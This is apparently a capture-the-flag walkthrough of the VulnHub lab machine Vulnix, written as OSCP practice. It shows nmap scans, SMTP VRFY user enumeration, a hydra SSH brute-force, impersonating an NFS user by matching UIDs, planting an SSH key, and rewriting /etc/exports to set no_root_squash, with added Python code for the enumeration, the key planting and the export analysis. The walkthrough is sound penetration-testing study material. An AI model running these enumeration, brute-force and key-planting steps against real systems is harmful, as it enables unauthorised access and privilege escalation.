The machine
This machine is one of the machines from the OSCP preparation guide I received from one of my teachers. It is the next one on the list and it can be downloaded from vulnhub:
The challenge
The challenge or goal of the machine lists the following:
The goal; boot up, find the IP, hack away and obtain the trophy hidden away in /root by any means you wish – excluding the actual hacking of the vmdk
https://www.vulnhub.com/entry/hacklab-vulnix,48/
Walk-through
The walk-through is divided into three sections following the standard penetration testing process: information gathering –> exploitation –> post exploitation. It could be divided into more steps, but for simplicity we keep it to these three.
Information gathering
To start off we find the IP address of the machine with nmap, since netdiscover takes a while on my VMware. We use the command sudo nmap -sn 192.168.21.0/24 for this (-sn is a host discovery scan only, no port scan). The vulnerable machine has the IP 192.168.21.129.

So to start, we scan the machine for open ports with nmap. We do two scans: sudo nmap -sV -sC 192.168.21.129 -oA nmap (the default top 1000 ports) and sudo nmap -sV -sC -p- 192.168.21.129 -oA fullnmap (all 65535 ports). The parameters are: -sV for service and version detection, -sC for the default set of NSE scripts, -p- for a full port scan and -oA to save the output in all three formats (normal, grepable and XML) under the given base name.
The nmap results are:
kadeeli@Pentest:~$ sudo nmap -sV -sC 192.168.21.129 -oA nmap
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-04 02:53 EST
Stats: 0:04:30 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 96.00% done; ETC: 02:58 (0:00:04 remaining)
Nmap scan report for 192.168.21.129
Host is up (0.00090s latency).
Not shown: 988 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 10:cd:9e:a0:e4:e0:30:24:3e:bd:67:5f:75:4a:33:bf (DSA)
| 2048 bc:f9:24:07:2f:cb:76:80:0d:27:a6:48:52:0a:24:3a (RSA)
|_ 256 4d:bb:4a:c1:18:e8:da:d1:82:6f:58:52:9c:ee:34:5f (ECDSA)
25/tcp open smtp Postfix smtpd
|_smtp-commands: vulnix, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
|_ssl-date: 2020-03-04T07:56:49+00:00; +3s from scanner time.
79/tcp open finger Linux fingerd
|_finger: No one logged on.\x0D
110/tcp open pop3?
|_ssl-date: 2020-03-04T07:56:49+00:00; +2s from scanner time.
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100003 2,3,4 2049/udp nfs
| 100003 2,3,4 2049/udp6 nfs
| 100005 1,2,3 41699/tcp6 mountd
| 100005 1,2,3 42526/tcp mountd
| 100005 1,2,3 54269/udp6 mountd
| 100005 1,2,3 55371/udp mountd
| 100021 1,3,4 33851/tcp nlockmgr
| 100021 1,3,4 37863/udp6 nlockmgr
| 100021 1,3,4 55935/udp nlockmgr
| 100021 1,3,4 58084/tcp6 nlockmgr
| 100024 1 40992/tcp6 status
| 100024 1 47076/tcp status
| 100024 1 53594/udp6 status
| 100024 1 59671/udp status
| 100227 2,3 2049/tcp nfs_acl
| 100227 2,3 2049/tcp6 nfs_acl
| 100227 2,3 2049/udp nfs_acl
|_ 100227 2,3 2049/udp6 nfs_acl
143/tcp open imap Dovecot imapd
|_ssl-date: 2020-03-04T07:56:49+00:00; +3s from scanner time.
512/tcp open exec netkit-rsh rexecd
513/tcp open login OpenBSD or Solaris rlogind
514/tcp open tcpwrapped
993/tcp open ssl/imaps?
|_ssl-date: 2020-03-04T07:56:48+00:00; +2s from scanner time.
995/tcp open ssl/pop3s?
|_ssl-date: 2020-03-04T07:56:48+00:00; +2s from scanner time.
2049/tcp open nfs_acl 2-3 (RPC #100227)
MAC Address: 00:0C:29:AB:64:0D (VMware)
Service Info: Host: vulnix; OS: Linux; CPE: cpe:/o:linux:linux_kernel
The full port scan (-p-) additionally found the following high RPC ports, which lie outside nmap's default top 1000:
33851/tcp open nlockmgr 1-4 (RPC #100021)
40584/tcp open mountd 1-3 (RPC #100005)
41399/tcp open mountd 1-3 (RPC #100005)
42526/tcp open mountd 1-3 (RPC #100005)
47076/tcp open status 1 (RPC #100024)
So we have a decent number of ports: 22 for SSH, 25 for SMTP (mail server), 79 for finger (no idea what this is), 110 for POP3 (mail server), 111 for rpcbind, which advertises NFS on 2049 together with mountd, and 143 for IMAP. Then ports 512 to 514 for something I don't recognise. For reference: finger is a legacy service that reports who is logged in and details about a named account, so it is another user-enumeration channel, and 512/513/514 are the Berkeley r-services (rexec, rlogin, rsh), which authenticate with cleartext passwords or host-based trust.
RPC
Let's see what the RPC mount has to offer. We can see the RPC info with rpcinfo -p, but we already got this from nmap. We can list the available exports with showmount -e 192.168.21.129 and then mount one with the mount command.

But we are not allowed to enter this directory:

I tried to make myself nobody, but I still got the message permission denied.
SSH
No relevant banner was seen when connecting with ssh 192.168.21.129:

SMTP
I had no idea how to test this so I googled some enumeration guides. (The nmap output above already lists VRFY among the commands the Postfix server accepts, which is what makes the enumeration below possible.) We can enumerate users with the tool smtp-user-enum, which can be installed with apt install smtp-user-enum. We use a list of usernames from SecLists: /opt/SecLists/Usernames/xato-net-10-million-usernames.txt. Our command is smtp-user-enum -M VRFY -U /opt/SecLists/Usernames/xato-net-10-million-usernames.txt -t 192.168.21.129, where -M VRFY is the attack method, -U /opt/… is the username wordlist and -t 192.168.21.129 is the target.
We found the following users:
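To make the VRFY method concrete, here is an added example (not part of the original post and not smtp-user-enum's code) that sends VRFY for each candidate name over a single SMTP session and classifies the replies. So that it runs offline, it talks to a small fake SMTP server started in the same process; the fake server's reply formats (252 for a recognised user, 550 for an unknown one) are modelled on Postfix, and the user set and wordlist are constructed stand-ins for the real host and the SecLists file.

```python
"""SMTP VRFY user enumeration against an in-process fake server.

Added example: not the post's tooling and not smtp-user-enum. The fake
server's replies are modelled on Postfix (252 = mailbox recognised,
550 = user unknown); the user set and wordlist below are constructed.
"""
import socket
import threading

# Constructed: the accounts the fake server pretends to know about.
FAKE_LOCAL_USERS = {"root", "user", "vulnix", "postfix"}


def _serve_one(conn: socket.socket) -> None:
    """Handle a single client: greeting, HELO/EHLO, VRFY, QUIT."""
    rd = conn.makefile("rb")
    conn.sendall(b"220 vulnix ESMTP Postfix (Ubuntu)\r\n")
    for raw in rd:
        verb, _, arg = raw.decode(errors="replace").strip().partition(" ")
        verb = verb.upper()
        if verb in ("HELO", "EHLO"):
            conn.sendall(b"250 vulnix\r\n")
        elif verb == "VRFY":
            name = arg.strip()
            if name in FAKE_LOCAL_USERS:
                conn.sendall(f"252 2.0.0 {name}\r\n".encode())
            else:
                conn.sendall((f"550 5.1.1 <{name}>: Recipient address rejected: "
                              f"User unknown in local recipient table\r\n").encode())
        elif verb == "QUIT":
            conn.sendall(b"221 2.0.0 Bye\r\n")
            break
        else:
            conn.sendall(b"502 5.5.2 Error: command not recognized\r\n")
    rd.close()
    conn.close()


def start_fake_smtp() -> int:
    """Listen on a random loopback port in a daemon thread; return the port."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def accept_loop():
        while True:
            conn, _ = srv.accept()
            threading.Thread(target=_serve_one, args=(conn,), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv.getsockname()[1]


def _read_reply(rd) -> str:
    """Read one SMTP reply, including multi-line ones ('250-...' continuations)."""
    lines = []
    while True:
        line = rd.readline().decode(errors="replace").rstrip("\r\n")
        lines.append(line)
        if len(line) < 4 or line[3] != "-":
            return "\n".join(lines)


def vrfy_enum(host: str, port: int, candidates) -> dict:
    """VRFY each candidate over one session: True = exists, False = unknown, None = undecidable.

    250/252 means the server recognised the name, 550 means it does not exist.
    Any other code (e.g. 502 when VRFY is disabled) is reported as None so the
    caller can tell 'method failed' apart from 'user absent'.
    """
    results = {}
    with socket.create_connection((host, port), timeout=5) as s:
        rd = s.makefile("rb")
        _read_reply(rd)                       # 220 greeting
        s.sendall(b"HELO scanner.local\r\n")
        _read_reply(rd)
        for name in candidates:
            s.sendall(f"VRFY {name}\r\n".encode())
            code = _read_reply(rd)[:3]
            results[name] = True if code in ("250", "252") else False if code == "550" else None
        s.sendall(b"QUIT\r\n")
        _read_reply(rd)
    return results


def demo() -> dict:
    """Run the enumeration against the fake server with a constructed wordlist."""
    port = start_fake_smtp()
    wordlist = ["admin", "root", "user", "vulnix", "nobody_here"]  # stand-in for the SecLists file
    return vrfy_enum("127.0.0.1", port, wordlist)


if __name__ == "__main__":
    for name, hit in demo().items():
        print(f"{name}: {'exists' if hit else 'unknown' if hit is False else 'undecidable'}")
```

Against a real target the same client code is pointed at port 25; the point of the three-way result is that a server answering 502 to every VRFY (VRFY disabled) must not be read as "no users found", and the fallback in that case is RCPT TO, which smtp-user-enum also supports with -M RCPT.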

Exploitation
SSH Bruteforce
We have some users. Let's try to bruteforce them with hydra. We use the command hydra -l user -P /usr/share/wordlists/rockyou.txt -t 4 ssh://192.168.21.129, where -l user selects the user user, -P /usr/share/wordlists/rockyou.txt selects the rockyou wordlist, ssh://192.168.21.129 is the SSH login to bruteforce and -t 4 limits it to 4 parallel tasks, since hydra warned me that SSH normally doesn't like many concurrent connection attempts.
It was running a bit too long, so I used the darknet top 100 and top 1000 lists from the SecLists GitHub repository.

Let's try to log in with SSH, and it worked!

Privilege escalation
I looked around for a while and found that the dovecot service is running as root, but I could not find an exploit or anything interesting in the config files.
So after looking around and finding nothing, I thought maybe we have to go back and test the NFS share /home/vulnix. This is the home directory of the user vulnix. We can get his UID and everything from the /etc/passwd file on the Vulnix server. Maybe we just have to add a vulnix user to our Kali machine with that UID, and we may have access. This works because NFS with the default AUTH_SYS authentication simply trusts the UID the client presents; root_squash only remaps UID 0 to the anonymous user, so a client user with the same UID as vulnix is treated as vulnix by the server. And yes we did:

But there is nothing of interest in the directory. Hmm. However, I was able to change the permissions of the home directory:


And now we have access to the directory as the user user. But still there is nothing in here. But what if we create a bash script with the SUID bit set so that it gives us a shell as the vulnix user? This did not work, no idea why, but it didn't want to work. Probably because it doesn't work this way with SUID bits. (Linux ignores the setuid bit on interpreted scripts; it is only honoured on binaries.)
So I tried the following: 1. generate SSH keys, 2. put the public key into the mounted home directory and 3. log in. This went a bit differently since I fucked around with the file permissions. In the end we had to: 1. generate the SSH key pair, 2. make a .ssh directory in the mounted folder, 3. echo the public key into the .ssh directory as a file named authorized_keys and 4. set the permissions of .ssh to 700 and of authorized_keys to 644. One caveat: sshd with StrictModes on (the default) also requires the home directory itself to be owned by the user and not group- or world-writable, so if the home directory was made group- or world-writable earlier to get into it, that has to be reverted before the key is accepted.
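Added example, not from the post and not OpenSSH's code: the permission rule sshd's StrictModes applies to the chain home -> .ssh -> authorized_keys, reproduced with os.stat, plus a helper that plants a key with the 700/644 permissions the steps above arrive at. The demo uses a temporary directory as a stand-in for /home/vulnix and a dummy public key; it shows a world-writable home directory being flagged and the check passing once the mode is restored. The function models sshd's check; it does not call into sshd.

```python
"""Model of the StrictModes check sshd applies to ~/.ssh/authorized_keys.

Added example (not the post's, not OpenSSH's code). With StrictModes (the
default) sshd ignores the key file unless authorized_keys, ~/.ssh and the
home directory are all owned by the user (or root) and none of them is
group- or world-writable. A key planted over NFS that is silently rejected
usually fails exactly this rule.
"""
import os
import stat
import tempfile

GROUP_OR_WORLD_WRITABLE = stat.S_IWGRP | stat.S_IWOTH


def strictmodes_problems(home: str, uid: int):
    """Return the reasons sshd would reject home/.ssh/authorized_keys (empty = OK)."""
    problems = []
    chain = [home,
             os.path.join(home, ".ssh"),
             os.path.join(home, ".ssh", "authorized_keys")]
    for path in chain:
        try:
            st = os.stat(path)
        except FileNotFoundError:
            problems.append(f"{path}: missing")
            break
        if st.st_uid not in (uid, 0):
            problems.append(f"{path}: owned by uid {st.st_uid}, not {uid} or root")
        if st.st_mode & GROUP_OR_WORLD_WRITABLE:
            problems.append(f"{path}: mode {oct(st.st_mode & 0o777)} is group/world writable")
    return problems


def plant_key(home: str, pubkey: str) -> None:
    """Append pubkey to ~/.ssh/authorized_keys with .ssh=700 and the file=644."""
    ssh_dir = os.path.join(home, ".ssh")
    os.makedirs(ssh_dir, mode=0o700, exist_ok=True)
    os.chmod(ssh_dir, 0o700)
    ak = os.path.join(ssh_dir, "authorized_keys")
    with open(ak, "a") as f:
        f.write(pubkey.rstrip("\n") + "\n")
    os.chmod(ak, 0o644)


def demo():
    """Reproduce the failure mode: a world-writable home blocks the key until fixed."""
    # Constructed stand-ins: a temp dir plays /home/vulnix, the key is a dummy.
    fake_key = "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleKeyNotReal kali@attacker"
    with tempfile.TemporaryDirectory() as tmp:
        home = os.path.join(tmp, "vulnix")
        os.mkdir(home)
        plant_key(home, fake_key)
        os.chmod(home, 0o777)   # what loosening the home directory's permissions does
        before = strictmodes_problems(home, os.getuid())
        os.chmod(home, 0o755)   # the fix: owner-writable only
        after = strictmodes_problems(home, os.getuid())
    return before, after


if __name__ == "__main__":
    before, after = demo()
    print("with 777 home:", before)
    print("with 755 home:", after)
```

The ownership check is the other half of the rule: over an NFS mount the files are created as whatever UID the client used, so the local vulnix user created earlier has to have the same UID as the server's vulnix account or sshd will reject the directory as foreign-owned.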

and now we can SSH into the machine:

This user can run the sudoedit command on the /etc/exports file. But what is this file?


So I googled root_squash and found an explanation of how we can misuse this. It also gave an example of how to disable it: we can change root_squash to no_root_squash. This can be done with the sudoedit command.
Now we have to restart the Vulnix server as described in the post I found earlier, remount the share, and then we can probably run our SUID /bin/bash? We can remount it with sudo mount 192.168.21.129:/home/vulnix /mnt/user. I didn't get it to work; I should go back to the machine on a later date since I'm pretty burned.
So after trying again on my own computer, it still didn't work. I keep getting the message cannot execute binary file after compiling C code or copying my own /bin/bash. So I checked the challenge again: we should get the flag in /root. I could not access this as the vulnix user, but I can make a share with the sudoedit /etc/exports command. So I added the following:

Restarted Vulnix, mounted the file system and we are in!
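Added example (not the post's and not the VM's real /etc/exports): a parser for export entries together with a model of how an AUTH_SYS NFS server maps the client's UID under root_squash, no_root_squash and all_squash. It covers both the earlier step (a local user with vulnix's UID being accepted on /home/vulnix while root is squashed to nobody) and this one (an export with no_root_squash letting client root act as server root), and ends with the check an auditor would run over the file. The sample exports content, the UID 1234 and the /root line are constructed for illustration.

```python
"""Parse /etc/exports and model NFS UID squashing.

Added example, not from the post or the Vulnix VM. SAMPLE_EXPORTS is
constructed; the squash semantics follow exports(5): root_squash (the
default) maps UID 0 to anonuid, all_squash maps every UID, no_root_squash
passes UID 0 through unchanged.
"""
import re

DEFAULT_ANON = 65534  # "nobody"/"nogroup" on most Linux systems

# Constructed sample content (not the VM's real file).
SAMPLE_EXPORTS = """\
# /etc/exports: the access control list for filesystems which may be exported
/home/vulnix   *(rw,root_squash)
/srv/public    192.168.21.0/24(ro,all_squash,anonuid=1001,anongid=1001)
/root          *(rw,no_root_squash)
"""

# Single-client form only: "path client(opt,opt,...)".
ENTRY_RE = re.compile(r"^(\S+)\s+(\S+?)\((.*?)\)\s*$")


def parse_exports(text: str):
    """Return a list of (path, client, [options]) for each non-comment line."""
    out = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        m = ENTRY_RE.match(line)
        if not m:
            raise ValueError(f"unrecognised export line: {line!r}")
        path, client, opts = m.groups()
        out.append((path, client, [o.strip() for o in opts.split(",") if o.strip()]))
    return out


def _opt_value(opts, key, default):
    """Fetch an integer-valued option such as anonuid=1001."""
    for o in opts:
        if o.startswith(key + "="):
            return int(o.split("=", 1)[1])
    return default


def effective_uid(client_uid: int, opts) -> int:
    """UID the server acts as for a request that carries client_uid."""
    anon = _opt_value(opts, "anonuid", DEFAULT_ANON)
    if "all_squash" in opts:
        return anon
    if client_uid == 0 and "no_root_squash" not in opts:
        return anon
    return client_uid          # any non-root UID is trusted as-is under AUTH_SYS


def risky_exports(text: str):
    """Findings a pentester or auditor would flag in the exports file."""
    findings = []
    for path, client, opts in parse_exports(text):
        if "no_root_squash" in opts:
            findings.append(f"{path} {client}: no_root_squash (client root is server root)")
        if client == "*" and "rw" in opts:
            findings.append(f"{path} {client}: writable by any host")
    return findings


if __name__ == "__main__":
    home_opts = parse_exports(SAMPLE_EXPORTS)[0][2]
    print("root on /home/vulnix acts as uid", effective_uid(0, home_opts))
    print("uid 1234 on /home/vulnix acts as uid", effective_uid(1234, home_opts))
    for f in risky_exports(SAMPLE_EXPORTS):
        print("RISK:", f)
```

Read against the walkthrough: on the /home/vulnix line client root becomes 65534 (hence the permission denied seen earlier even as root on Kali), any other UID is passed straight through (hence the matching-UID trick), and the /root line with no_root_squash is exactly the state that lets a client mount it and act as root on the server.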

However, we had to switch to the root user:

Flag
